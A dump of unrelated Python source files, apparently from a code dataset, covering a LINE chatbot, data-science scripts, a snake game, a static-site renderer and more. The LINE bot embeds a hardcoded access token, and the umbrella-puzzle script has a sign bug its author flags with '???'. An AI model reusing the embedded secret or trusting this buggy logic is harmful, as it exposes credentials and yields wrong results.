frame.Frame()\nfdb = FDB.FDB()\n\n# read and process the frames from a file\nframes.read_frames()\nframes.parse_each_frame()\n\n# read and process the FDB from a file\nfdb.read_fdb()\nfdb.parse_fdb()\n\n#print(frames.frames)\n#print(fdb.fdb_entries)\n\n# for each frame, make a decision based on the FDB\n# and collect the decision into a list\nfor i in range(len(frames.frames)):\n info = fdb.strategies(frames.frames[i])\n frames.frames[i] += [info]\n print(info)\n\n# write the decisions into a file\nprint(fdb.fdb_entries)\nprint(frames.frames)\nframes.write_output()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"246925024","text":"#!/usr/bin/env python\n# -*- coding: utf 8 -*-\n\"\"\"\nInitialize the library.\n\n:copyright: 2015 - Geo2X - VM\n:license: Apache 2.0\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\ndef _removeAxes(fig):\n \"\"\"\n Remove all axes from current figure and return blank figure\n \"\"\"\n axes = 
fig.get_axes()\n    for a in axes:\n        fig.delaxes(a)\n    return fig\n    \ndef verticalAxes(fig, n=2):\n    \"\"\"\n    Add n vertically stacked axes on the selected figure\n    \n    Returns figure and ax list\n    \"\"\"\n    fig = _removeAxes(fig)\n    ax = []\n    for i in range(n):\n        ax.append( fig.add_subplot(n,1,i+1) )  # subplot indices are 1-based\n    return fig, ax\n    \ndef horizontalAxes(fig, n=2):\n    \"\"\"\n    Add n horizontally stacked axes on the selected figure\n    \n    Returns figure and ax list\n    \"\"\"\n    fig = _removeAxes(fig)\n    ax = []\n    for i in range(n):\n        ax.append( fig.add_subplot(1,n,i+1) )  # subplot indices are 1-based\n    return fig, ax","sub_path":"hierophis/plot/layout/subplots.py","file_name":"subplots.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"163892714","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport difflib\nimport numpy as np\nimport pandas as pd\nimport itertools as it\nimport multiprocessing\nfrom datetime import datetime\nfrom ast import literal_eval\nimport settings\n\nfrom features import get_set_inter_assoc\nfrom features import jaccard_distance\nfrom features import diff_ratios\nfrom features import get_noun_intersect\n\n\ndef get_features(idx, row, is_test=False):\n    qid1 = row['qid1']\n    qid2 = row['qid2']\n    tokens1 = set(row['tokens1'])\n    tokens2 = set(row['tokens2'])\n    question1 = row['question1']\n    question2 = row['question2']\n    token_inter, token_assoc = get_set_inter_assoc(tokens1, tokens2)\n    label = int(row.get('is_duplicate', 0)) or -1\n    pair = '{qid1}_{qid2}'.format(qid1=qid1, qid2=qid2)\n    metas = {\n        'match_tokens': jaccard_distance(tokens1, tokens2),\n        'math_chars': diff_ratios(question1, question2),\n    }\n    token_noun_inter, token_noun_assoc = get_noun_intersect(tokens1, tokens2)\n    if is_test:\n        pair = str(idx)\n        label = 0\n    s = ('{label} {pair}'\n         '|token_inter {token_inter} '\n         '|token_assoc {token_assoc} '\n         '|meta {meta_features} '\n         '|noun_inter {noun_inter} '\n         '|noun_assoc {noun_assoc}\\n').format(\n        label=label,\n        pair=pair,\n        token_inter = ' '.join(token_inter),\n        token_assoc = ' '.join(token_assoc),\n        meta_features = ' '.join(['%s:%f' % x for x in metas.items()]),\n        noun_inter = ' '.join(token_noun_inter),\n        noun_assoc = ' '.join(token_noun_assoc),\n    )\n    return s\n\n\ndef get_df_features(df, is_test, fname):\n    f = open(fname, 'a')\n    for idx in df.index:\n        row = df.loc[idx]\n        s = get_features(idx, row, is_test=is_test)\n        f.write(s)\n    f.close()\n\n\ndef prepare_vw_dataset(df, is_test, vw_path='../vw_tmp/', fname='train'):\n    fname = os.path.join(vw_path, fname)\n    print('Start building %s' % fname)\n    with multiprocessing.Pool(settings.butch_num) as pool:\n        \n        args = zip(np.array_split(df, settings.butch_num),\n                   it.repeat(is_test),\n                   it.repeat(fname))\n        pool_results = pool.starmap(get_df_features, args)\n        for pool_result in pool_results:\n            pass\n\n\ndef join_with_questions(df, df_question):\n    columns = [x for x in df.columns]\n    df_question = df_question[['tokens']]\n    df_question = df_question.rename(columns={'tokens': 'tokens1'})\n    df = pd.merge(df, df_question, left_on='qid1', right_index=True)\n    columns = columns + ['tokens1']\n    df = df[columns]\n    df_question = df_question.rename(columns={'tokens1': 'tokens2'})\n    df = pd.merge(df, df_question, left_on='qid2', right_index=True)\n    columns = columns + ['tokens2']\n    df = df[columns]\n    return df\n\n\ndef main(argv):\n    train = pd.read_csv(settings.TRAIN_CONVERTED)\n    test = pd.read_csv(settings.TEST_CONVERTED)\n    train_features = pd.read_csv(settings.UNIQUE_QUESTION_TRAIN_TOKENS, 
names=['question', 'tokens'], index_col=0)\n test_features = pd.read_csv(settings.UNIQUE_QUESTION_TEST_TOKENS, names=['question', 'tokens'], index_col=0)\n #\n # convert tokens\n train_features.tokens = train_features.tokens.apply(literal_eval)\n test_features.tokens = test_features.tokens.apply(literal_eval)\n #\n # join with tokens\n train = join_with_questions(train, train_features)\n test = join_with_questions(test, test_features)\n #\n # rebalance data\n train_1 = train[train.is_duplicate == 1]\n train_0 = train[train.is_duplicate == 0]\n train_0 = train_0.sample(frac=2.5, replace=True)\n train_rebalanced = pd.concat([train_0, train_1])\n train_rebalanced = train_rebalanced.iloc[np.random.permutation(len(train_rebalanced))]\n train_rebalanced.index = range(len(train_rebalanced))\n #\n # building vw files\n print(datetime.now())\n prepare_vw_dataset(train_rebalanced, False, fname='train_rebalanced')\n print(datetime.now())\n prepare_vw_dataset(train, False, fname='train')\n print(datetime.now())\n prepare_vw_dataset(test, True, fname='test')\n print(datetime.now())\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"quora/scripts/prepare_dataset.py","file_name":"prepare_dataset.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"492971071","text":"# 7669 Сходинки\nn=input().split()\na=int(n[0])\nb=int(n[1])\nsymbol=str(n[2])\nif 0<=a-b<=1:\n print(a)\nelif symbol=='W':\n print(b+1)\nelif symbol=='S':\n print(b+2)\n","sub_path":"7000-7999/7669.py","file_name":"7669.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"320155336","text":"# -*- coding: utf-8 -*-\n\nfrom yaml import load\n\n# yaml can use one of two parsers.\ntry: # LibYAML version written in C\n from yaml import CLoader as Loader\nexcept ImportError: # Python version\n from yaml import Loader\n\n\nclass YAMLLoader(object):\n \"\"\"Convenience class to load and parse YML files.\n\n Parameters:\n - path: A string that needs to work with open(path)\n\n Adds convenience with regard to case\n \"\"\"\n\n def __init__(self, path=None):\n if path is None:\n raise AttributeError(\"Path must be set\")\n with open(path) as f:\n self._config = load(f.read(), Loader)\n\n def get(self):\n \"\"\"Returns the contents of the file parsed into a dict\"\"\"\n return self._config\n\n def get_lower(self):\n \"\"\"Returns a dict of the config file, with all keys lowercased\"\"\"\n return self._lower_keys(self._config)\n\n def _lower_keys(self, x):\n \"\"\"\n See\n https://stackoverflow.com/questions/4223654/\n how-to-ensure-that-a-python-dict-keys-are-lowercase for more info\n \"\"\"\n\n if isinstance(x, list):\n return [self._lower_keys(v) for v in x]\n elif isinstance(x, dict):\n return dict((k.lower(), self._lower_keys(v)) for k, v in x.items())\n else:\n return x\n","sub_path":"goption_brain/config/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"633828555","text":"from flask import Flask , request\r\nimport time\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport gspread\r\n\r\n# รับค่าจาก User ผ่าน Line แล้วมาค้นหาข้อมูลใน Google Sheet\r\n\r\n\r\nlist_result_search = []\r\nresult_text = []\r\nreply_msg = []\r\n\r\ndef connect_google_sheet() :\r\n\tscope = 
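The rebalancing step in `main` oversamples one class with replacement and then shuffles by integer position. A minimal, self-contained illustration of that pattern (toy data; the `frac` value is the record's own choice):

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({'is_duplicate': [1, 1, 0, 0, 0, 0], 'qid1': range(6)})
train_1 = df[df.is_duplicate == 1]
train_0 = df[df.is_duplicate == 0].sample(frac=2.5, replace=True, random_state=0)
rebalanced = pd.concat([train_0, train_1])
rebalanced = rebalanced.iloc[np.random.permutation(len(rebalanced))]  # shuffle rows
rebalanced.index = range(len(rebalanced))
print(rebalanced.is_duplicate.value_counts())  # negatives now ~2.5x their original count
```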
[\"https://www.googleapis.com/auth/spreadsheets\"]\r\n\tcredentials = ServiceAccountCredentials.from_json_keyfile_name('credentials_google_api_mobile_operator.json', scope)\r\n\tgc = gspread.authorize(credentials)\r\n\t# Google Sheet name = linechatbot/google_api_mobile_operator\r\n\tsheet1 = gc.open_by_url('https://docs.google.com/spreadsheets/d/1o9fPEjsk-D_c9j6WeYbwMQtmdsq-HTEbw3E7_rnuUSA/edit#gid=0')\r\n\r\n\t# # Google Sheet name = line_link_sheet\r\n\t# sheet1 = gc.open_by_url('https://docs.google.com/spreadsheets/d/1XQXkBL_JDF26MMbm2MxRe68nVJsh3TYj9Uss8cET2Fo/edit#gid=0')\r\n\tworksheet = sheet1.get_worksheet(0) # sheet index in spreadsheets\r\n\tglobal list_data_sheet\r\n\tlist_data_sheet = worksheet.get_all_values()\r\n\r\napp = Flask(__name__)\r\nline_access_token = 'apiNXSRhFfgIJ+ueODzpaYbWloo8mtcVvhp7n6fZAN4/yZ4DWbQChvwxOULpt0c3iUbw1gfvu8HotYNTmvwaCiWVZiGuMoq7mcLQezNZ9J9vlvcDt/1QJXmL1elGMqRX8xOvdSGYjzdeKmQnsMLP2gdB04t89/1O/w1cDnyilFU='\r\n\r\n@app.route('/')\r\n\r\n@app.route(\"/webhook\", methods=[\"POST\",\"GET\"])\r\ndef webhook() :\r\n\tfrom reply_new import ReplyMessage # ดึง Function จาก File ชื่อ reply_new.py\r\n\tif request.method == \"GET\" :\r\n\t\treturn \"Your = GET method from ngrok\"\r\n\telif request.method == \"POST\" : # Check Method ถ้าเป็น POST คือเราที่เราส่งข้อความไปในไลน์\r\n\t\tdata = request.get_json() # รับข้อมูลแบบ json\r\n\t\tconnect_google_sheet()\r\n\r\n\t\tlist_result_search = []\r\n\t\ttext_from_line = data[\"events\"][0][\"message\"][\"text\"]\r\n\t\treply_token = data[\"events\"][0][\"replyToken\"]\r\n\r\n\t\tfor ii in range(len(list_data_sheet)) :\r\n\t\t\t# ตรวจสอบ\r\n\t\t\tif text_from_line in list_data_sheet[ii][0] : # ถ้ามี text_from_line (รับจาก User) มีค่าใน Google Sheet\r\n\t\t\t\tlist_result_search.append([str(list_data_sheet[ii][0]),str(list_data_sheet[ii][1])])\r\n\r\n\t\t# กรณี เจอข้อมูล 1 ข้อมูล\r\n\t\tif len(list_result_search) == 0 :\r\n\t\t\treply_msg = str(list_data_sheet[ii][0]) + ' : ' + str(list_data_sheet[ii][1])\r\n\t\t\tReplyMessage(Reply_token=reply_token, TextMessage=reply_msg,Line_Access_Token=line_access_token)\r\n\t\t# กรณี เจอข้อมูล มากกว่า 1 ข้อมูล\r\n\t\tif len(list_result_search) != 0 :\r\n\t\t\treply_msg = []\r\n\t\t\tfor iii in range(len(list_result_search)) :\r\n\t\t\t\tresult_text = str(list_result_search[iii][0]) + ' : ' + str(list_result_search[iii][1])\r\n\t\t\t\treply_msg = str(reply_msg) + ' , ' + str(result_text)\r\n\t\t\tprint(reply_msg)\r\n\t\t\tReplyMessage(Reply_token=reply_token, TextMessage=reply_msg,Line_Access_Token=line_access_token)\r\n\t\treturn \"OK\"\r\n\r\nif __name__ == \"__main__\" :\r\n\tapp.run(port = 200)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"156143385","text":"import numpy as np\n\nI = -1; T = 10.; Nt = 40\n\ndt = T/float(Nt)\nt = np.linspace(0, T, Nt+1)\nu = np.zeros(Nt+1)\n\nu[0] = I\nfor n in range(Nt):\n u[n+1] = u[n]*( 1 + dt*np.sin(t[n]) )\n \nimport matplotlib.pyplot as plt\nplt.figure()\nplt.plot(t, u, 'r--o')\nt_fine = np.linspace(0, t[-1], 101) # for u_ex\nu_ex = I*np.exp( 1 - np.cos(t_fine) )\nplt.xlabel('t')\nplt.ylabel('u')\nplt.plot(t_fine, u_ex, 'b-')\nplt.legend(['numerical','exact'], loc='upper left')\ndt = t[1] - t[0]\nplt.title('dt=%g' % dt)\numin = 1.1*u_ex.min(); umax = 0.5\nplt.axis([t[0], t[-1], umin, 
umax])\nplt.grid(True)\nplt.show()\n\n","sub_path":"Euler_v0.py","file_name":"Euler_v0.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"628918805","text":"from grpc.beta import implementations\nimport numpy\nimport tensorflow as tf\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_service_pb2\n\ntf.app.flags.DEFINE_string('server', 'localhost:8500', 'PredictionService host:port')\nFLAGS = tf.app.flags.FLAGS\n\n\ndef do_inference(hostport):\n \"\"\"Tests PredictionService with concurrent requests.\n Args:\n hostport: Host:port address of the Prediction Service.\n Returns:\n pred values, ground truth label\n \"\"\"\n # create connection\n host, port = hostport.split(':')\n channel = implementations.insecure_channel(host, int(port))\n stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)\n\n # initialize a request\n request = predict_pb2.PredictRequest()\n request.model_spec.name = 'rnn_emoji_prediction'\n request.model_spec.signature_name = 'predict_words'\n\n # Randomly generate some test data\n num_steps = 30\n words = [\"I love you\"]\n padded_words = words + [\"_PAD\"] * (num_steps - len(words))\n request.inputs['input_data_words'].CopyFrom(\n tf.contrib.util.make_tensor_proto([padded_words], shape=[1, num_steps]))\n request.inputs['k'].CopyFrom(\n tf.contrib.util.make_tensor_proto(3, shape=[]))\n\n\n\n\n #\n # # Randomly generate some test data\n # temp_data = numpy.random.randn(10, 3).astype(numpy.float32)\n # data, label = temp_data, numpy.sum(temp_data * numpy.array([1, 2, 3]).astype(numpy.float32), 1)\n # request.inputs['input'].CopyFrom(\n # tf.contrib.util.make_tensor_proto(data, shape=data.shape))\n\n # predict\n result = stub.Predict(request, 5.0) # 5 seconds\n return result\n\n\ndef main(_):\n if not FLAGS.server:\n print('please specify server host:port')\n return\n\n result = do_inference(FLAGS.server)\n print('Result is: ', result)\n\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"295200622","text":"from unittest.mock import patch\n\nimport pytest\n\nfrom minitor.main import Alert\nfrom minitor.main import Monitor\n\n\nclass TestAlert(object):\n\n @pytest.fixture\n def monitor(self):\n return Monitor({\n 'name': 'Dummy Monitor',\n 'command': ['echo', 'foo'],\n })\n\n @pytest.fixture\n def echo_alert(self):\n return Alert(\n 'log',\n {\n 'command': [\n 'echo', (\n '{monitor_name} has failed {failure_count} time(s)!\\n'\n 'We have alerted {alert_count} time(s)'\n )\n ]\n }\n )\n\n def test_simple_alert(self, monitor, echo_alert):\n monitor.total_failure_count = 1\n monitor.alert_count = 1\n with patch.object(echo_alert.logger, 'error') as mock_error:\n echo_alert.alert(monitor)\n mock_error.assert_called_once_with(\n 'Dummy Monitor has failed 1 time(s)!\\n'\n 'We have alerted 1 time(s)'\n )\n","sub_path":"tests/alert_test.py","file_name":"alert_test.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"456427504","text":"\"\"\"\n部门聚餐,下大雨,要将所有人从食堂运到办公室。\n现在由大伞和小伞,小伞一次撑2个人,大伞一次撑3个人\n在最开始时食堂的人有一把小伞,办公室里有n把小伞,m把大伞。\n从办公室到食堂的往返时间为2小伞,去1h,回1h。\n每个人一次只能带一把伞。\n求所有人回到办公室的最短时间。\n输入:\n一个数字T,T组数据\n每组为c n m,代表人数,小伞数,大伞数\n测试用例:c=11 n=1 
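The `Euler_v0.py` record integrates u' = u·sin(t), u(0) = I, whose exact solution is u(t) = I·e^(1−cos t). Forward Euler is first-order accurate, so halving dt should roughly halve the end-point error; a quick convergence check built from the same scheme:

```python
import numpy as np

def endpoint_error(Nt, I=-1.0, T=10.0):
    dt = T / float(Nt)
    t = np.linspace(0, T, Nt + 1)
    u = np.zeros(Nt + 1)
    u[0] = I
    for n in range(Nt):
        u[n + 1] = u[n] * (1 + dt * np.sin(t[n]))   # forward Euler step
    return abs(u[-1] - I * np.exp(1 - np.cos(T)))   # compare to exact solution

for Nt in (40, 80, 160):
    print(Nt, endpoint_error(Nt))  # error ratio between successive rows approaches 2
```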
m=2\n\"\"\"\n\n\ndef func(c, n, m):\n left_num = c\n left_u2 = 1\n left_u3 = 0\n count = 0\n right_num = 0\n while left_num > 0:\n count += 1 # 送\n left_num = left_num - left_u2 * 2 + left_u3 * 3\n if left_num <= 0:\n break\n else:\n right_num = c - left_num\n # 回去送伞\n count += 1\n back_num = min(right_num, n + m + 1) # 回去人数\n left_num = left_num + back_num\n # 更新带去新伞数量: 优先大伞\n left_u3 = min(back_num, m)\n left_u2 = back_num - left_u3\n return count\n\n\nprint(func(11, 1, 2)) # ???\n\n\"\"\"\n11 -> 2 -> (9, 2)\n11 <- 2(0, 2)\n11 -> 6 ->(5, 6)\n9 <- 4(2, 2)\n9 -> 9 -> ok\n\"\"\"\n","sub_path":"algo/送伞问题.py","file_name":"送伞问题.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"410988154","text":"import random\nsum = 0\ncount = 0\nfor x in range(2, 101, 2):\n if x % 4 == 0:\n count += 1\n # print('This value:%d is eligible',x)\n sum += x\nprint('The first time sum:%d, count:%d' % (sum, count))\n\nsum = 0\nwhile sum < 100:\n sum += random.randint(1, 100)\nprint('sum:%d' % sum)","sub_path":"DailyCode/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"391730904","text":"import unittest\nfrom metacram import Dna, Record\n\nclass TestDna(unittest.TestCase):\n \n def setUp(self):\n pass\n \n def testParseFasta(self):\n with open('data/test.fasta') as handle:\n records = Dna(handle, type='fasta')\n self.assertEqual(len(list(records)), 5)\n \n def testParseFastq(self):\n with open('data/test.fastq') as handle:\n records = Dna(handle, type='fastq')\n self.assertEqual(len(list(records)), 5)\n \n def testParseQseq(self):\n with open('data/test.qseq') as handle:\n records = Dna(handle, type='qseq')\n self.assertEqual(len(list(records)), 5)\n\nclass TestRecord(unittest.TestCase):\n \n def testCreateFastaRecord(self):\n header, sequence = 'foo', 'GATC'\n record = Record(header, sequence)\n \n self.assertEqual(record.header, header)\n \n self.assertEqual(record.sequence, sequence)\n \n def testCreateFastqRecord(self):\n header, sequence, quality = 'foo', 'GATC', [10, 10, 10, 10]\n \n record = Record(header, sequence, quality)\n \n self.assertEqual(record.header, header)\n \n self.assertEqual(record.sequence, sequence)\n \n self.assertEqual(record.quality, quality)\n \n def testFormatPrinting(self):\n header, sequence, quality = 'foo', 'GATC', [10, 10, 10, 10]\n \n record = Record(header, sequence, quality)\n \n self.assertEqual(record.fasta, '>foo\\nGATC')\n self.assertEqual(record.fastq, '@foo\\nGATC\\n+foo\\n++++')\n \n # fails: self.assertRaises(Exception, record.qseq)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/dnaio.py","file_name":"dnaio.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"286912788","text":"from service import Service\nfrom settings import DIM, apple_count\n\n\nclass UI:\n def __init__(self):\n self.service = Service()\n\n def place_apples(self):\n self.service.place_apples(apple_count)\n\n def place_snake(self):\n self.service.place_snake()\n\n def print(self):\n matrix = self.service.storage()\n for i in range(DIM):\n for j in range(DIM):\n print('+---', end='')\n print('+')\n\n for j in range(DIM):\n if j == 0:\n print('| ', end='')\n if matrix[i][j] == 1:\n print('. 
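The `dnaio.py` tests expect quality `[10, 10, 10, 10]` to print as `'++++'` in FASTQ output. That is standard Phred+33 (Sanger) encoding, since `chr(10 + 33)` is `'+'`; a one-line helper of the kind `Record.fastq` presumably relies on:

```python
def phred33(quality):
    # map integer Phred scores to printable ASCII (offset 33)
    return ''.join(chr(q + 33) for q in quality)

assert phred33([10, 10, 10, 10]) == '++++'
```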
| ', end='')\n elif matrix[i][j] == 0:\n print(' | ', end='')\n elif matrix[i][j] == 2:\n print('+ | ', end='')\n else:\n print('* | ', end='')\n print()\n for j in range(DIM):\n print('+---', end='')\n print('+')\n\n def move(self, cmd):\n if cmd == '':\n self.service.move(1)\n else:\n self.service.move(cmd)\n\n def change_up(self):\n self.service.change_dir('up')\n\n def change_down(self):\n self.service.change_dir('down')\n\n def change_left(self):\n self.service.change_dir('left')\n\n def change_right(self):\n self.service.change_dir('right')\n\n def start(self):\n try:\n self.place_snake()\n self.place_apples()\n self.print()\n while True:\n cmd = input()\n if cmd[:4] == 'move':\n self.move(cmd[5:])\n elif cmd[:2] == 'up':\n self.change_up()\n elif cmd[:4] == 'down':\n self.change_down()\n elif cmd[:4] == 'left':\n self.change_left()\n elif cmd[:5] == 'right':\n self.change_right()\n else:\n print('Invalid input!')\n self.print()\n except Exception as e:\n print(str(e))\n","sub_path":"e1-916-Popa-Andrei-Calin/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29192258","text":"import argparse\nimport os\nfrom jinja2 import nodes\nfrom jinja2.exceptions import TemplateSyntaxError\nfrom jinja2.ext import Extension\nimport markdown2\nfrom staticjinja import make_site\n\n\nclass CleanLinkExtension(Extension):\n tags = set(['cleanlink'])\n clean_links = True\n\n def parse(self, parser):\n stream = parser.stream\n tag = stream.next()\n\n if stream.current.test('string'):\n url = parser.parse_expression()\n else:\n raise TemplateSyntaxError(\"'%s' requires url\" %\n tag.value, tag.lineno)\n\n body = parser.parse_statements(['name:endcleanlink'], drop_needle=True)\n return nodes.CallBlock(self.call_method('_clean_link', [url]),\n [], [], body).set_lineno(tag.lineno)\n\n def _clean_link(self, url, caller):\n inner = caller()\n if self.clean_links:\n url = url.replace('index.html', '')\n url = url.replace('.html', '')\n return '{inner}'.format(url=url, inner=inner)\n\n\ndef get_post_contents(template):\n with open(template.filename) as f:\n html = markdown2.markdown(f.read(), extras=['metadata'])\n context = html.metadata\n context['post'] = html\n return context\n\n\ndef render_post(env, template, **kwargs):\n post_template = env.get_template(\"_post.html\")\n post_path, post_filename = os.path.split(template.name)\n post_title, _ = post_filename.split('.')\n out_filename = '{}.html'.format(post_title)\n out_path = os.path.join(env.outpath, post_path)\n if post_path and not os.path.exists(out_path):\n os.makedirs(out_path)\n out = os.path.join(out_path, out_filename)\n post_template.stream(**kwargs).dump(out)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--watch', dest='watch', action='store_true',\n help='Keep running and watch for changes')\n parser.add_argument('--clean', dest='clean', action='store_true',\n help='Use clean links')\n args = parser.parse_args()\n\n CleanLinkExtension.clean_links = args.clean\n\n site = make_site(\n outpath='output',\n extensions=[\n CleanLinkExtension ],\n staticpaths=['goattower/static/', 'static/'],\n contexts=[\n ('.*.md', get_post_contents) ],\n rules=[\n ('.*.md', render_post) ] )\n\n 
site.render(use_reloader=args.watch)\n","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510630488","text":"# -*- encoding: utf-8 -*-\n\n\"\"\"\n Digitre\n ~~~~~~~\n A simple Machine Learning application to recognize handwritten digits.\n\n digitre_classifier.py includes a class with functionality to preprocess base64-encoded\n handwritten digit images and classify the digit in the image.\n\n :copyright: (c) 2017 by Luis Vale Silva.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\n__author__ = \"Luis Vale Silva\"\n__status__ = \"Development\"\n\nimport os\nimport digitre_preprocessing as prep\nimport digitre_model\n\nclass Classifier(object):\n \"\"\"\n Given base64-encoded image, transforms it to the appropriate format and predicts\n digit class.\n\n Classifier prepares base64-encoded image of handwritten digit (hopefully...) from\n html canvas by:\n . Converting it to numpy 3D array\n . Cropping it to square of minimum size around drawing (no smaller than of 28 x 28)\n . Centering it on its center of mass\n . Resizing it to 28 x 28\n . MinMax transforming pixel values between 0 and 255 to values between 0 and 1\n It then uses pre-trained machine learning model to predict digit class, with the\n output being the probability distribution over the 10 classes (0 to 9).\n\n Parameters\n ----------\n file_name: str, default='cnn.tflearn'\n File name of pre-trained TFLearn model\n copy : boolean, optional, default True\n Set to False to perform inplace row normalization and avoid a\n copy (if the input is already a numpy array).\n \"\"\"\n\n def __init__(self, file_name='cnn.tflearn'):\n cwd = os.path.dirname(__file__)\n # Load the model\n self.model = digitre_model.build()\n self.model.load(os.path.join(cwd, file_name))\n\n\n def preprocess(self, digit_image):\n \"\"\"\n Get digit drawn by user as base64 image and preprocess it for classification.\n\n Parameters\n ----------\n digit_image: string\n String of base64-encoded image of user drawing in html canvas.\n Returns\n -------\n Processed image as numpy 3D array ready for classification\n \"\"\"\n digit = prep.b64_str_to_np(digit_image)\n digit = prep.crop_img(digit)\n digit = prep.center_img(digit)\n digit = prep.resize_img(digit)\n digit = prep.min_max_scaler(digit, final_range=(0, 1))\n digit = prep.reshape_array(digit)\n return digit\n\n def classify(self, preprocessed_image):\n \"\"\"\n Get a preprocessed digit drawn by user and classify it as a digit from 0 to 9.\n\n Parameters\n ----------\n preprocessed_image: 4D numpy ndarray, shape=(1, 28, 28, 1)\n Image array to classify.\n Returns\n -------\n Image as numpy 3D array\n \"\"\"\n return self.model.predict(preprocessed_image)\n","sub_path":"digitre/digitre_classifier.py","file_name":"digitre_classifier.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"213864147","text":"from glob import glob\r\nimport pandas as pd\r\nimport re\r\nfrom pprint import pprint\r\nimport string\r\nfrom nltk.tokenize import word_tokenize\r\nfrom collections import defaultdict\r\nimport json\r\n\r\nimport codecs\r\nimport random\r\n\r\n\r\n# clean query and get pattern\r\ndef clean_query(query):\r\n\r\n ## string punctuation\r\n ## https://www.geeksforgeeks.org/string-punctuation-in-python/\r\n # excluding <>, _ since _ will insdie filt tag and / will be 
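`Classifier.preprocess` above calls `prep.min_max_scaler(digit, final_range=(0, 1))` from a `digitre_preprocessing` module that is not part of this record. A minimal numpy sketch consistent with that call (the guard for a constant image is an added assumption):

```python
import numpy as np

def min_max_scaler(img, final_range=(0, 1)):
    lo, hi = final_range
    mn, mx = float(img.min()), float(img.max())
    if mx == mn:
        return np.full(img.shape, lo, dtype=float)  # blank canvas: avoid 0/0
    return lo + (img - mn) * (hi - lo) / (mx - mn)
```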
inside tag\r\n    \r\n    punctuation = [p for p in string.punctuation if p != '<' and p != '>' and p != '_' and p != '/']\r\n\r\n    ## remove exclude words\r\n    ## ? maybe 'a' can be removed as well\r\n    exclude_words = ['hey', 'cortana', 'the']\r\n\r\n    ## remove punctuation\r\n    query = ''.join(ch for ch in query if ch not in set(punctuation))\r\n    query_filtered = [w for w in word_tokenize(query.lower()) if w not in exclude_words]\r\n\r\n    ## \"< \" , \" >\" remove extra space \r\n    return \" \".join(query_filtered).replace(\"< \",\"<\").replace(\" >\",\">\")\r\n\r\n'''\r\ndef clean_query(query):\r\n\r\n    ## string punctuation\r\n    ## https://www.geeksforgeeks.org/string-punctuation-in-python/\r\n    # excluding <>\r\n    # so _ will be replaced eg: file_keyword becomes filekeyword\r\n    punctuation = [p for p in string.punctuation if p != '<' and p != '>']\r\n\r\n    ## remove exclude words\r\n    ## ? maybe 'a' can be removed as well\r\n    exclude_words = ['hey', 'cortana', 'the']\r\n\r\n    ## remove punctuation\r\n    query = ''.join(ch for ch in query if ch not in set(punctuation))\r\n    query_filtered = [w for w in word_tokenize(query.lower()) if w not in exclude_words]\r\n\r\n    ## \"< \" , \" >\" remove extra space \r\n    return \" \".join(query_filtered).replace(\"< \",\"<\").replace(\" >\",\">\")\r\n'''\r\n\r\n\r\n# clean query and get pattern\r\n#eg: <file_type>a</file_type> to <file_type>\r\ndef reduce_xml_tag_and_remove_xml_value(pattern):\r\n    xmlpairs = re.findall(\"(<.*?>.*?<\\/.*?>)\", pattern)\r\n\r\n    # for debug \r\n    #print('original pattern before reduce {}'.format(pattern))\r\n\r\n\r\n    for xmlpair in xmlpairs:\r\n        # extract the type and value from the xml tag\r\n        xmlTypeEndInd = xmlpair.find(\">\")\r\n\r\n        xmlType = xmlpair[1:xmlTypeEndInd]\r\n\r\n        pattern = pattern.replace(xmlpair, \"<\"+xmlType+\">\")\r\n\r\n\r\n    pattern = pattern.strip()\r\n    # for debug \r\n    #print('original pattern after reduce {}'.format(pattern))\r\n    return pattern\r\n\r\n\r\ndef process_tagged_queries(queries, annotated_queries, intents, domain, DomainToSlotsProcess):\r\n    # assert(len(annotated_queries)==len(queries), \"Invalid query, annotation set\")\r\n    \r\n    # if needed, change this to list to also store list of 